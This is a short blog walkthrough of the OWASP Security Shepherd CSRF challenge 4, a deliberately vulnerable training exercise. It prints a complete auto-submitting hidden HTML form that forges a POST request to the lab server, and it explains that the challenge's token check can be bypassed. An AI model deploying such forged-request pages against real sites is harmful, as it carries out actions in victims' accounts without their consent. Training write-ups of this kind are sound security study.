OWASP Security Shepherd Project - CSRF 4 (CSRF Challenge)
Challenge
Solution
Challenge 4 is actually quite boring once we have finished the challenge 3. It is because the two challenge is somehow identical and we also how the csrfToken provided.Let's try to use the csrfToken directly and that makes our form to be as the followings:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengefour/plusplus" method="POST">
<input type="hidden" name="userid" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
<input type="hidden" name="csrfToken" value="-166399789448968328107143422839305748030"/>
<input type="submit"/>
</form>
<script> document.evilForm.submit(); </script>
As always, let's use python -m SimpleHTTPServer <port> to make a HTTP server & input the URL, then login as another user to see what happens.
We complete the challenge! However, I do notice that the csrfToken for this user is actually different from the original one.
Which means that either the csrfToken is useless or the token the challenge provided is panacea for the challenge. By changing the csrfToken to be arbitrary number, we know the truth is the former : )
留言
張貼留言
Welcome to share your comments or questions : -)
Enjoy life!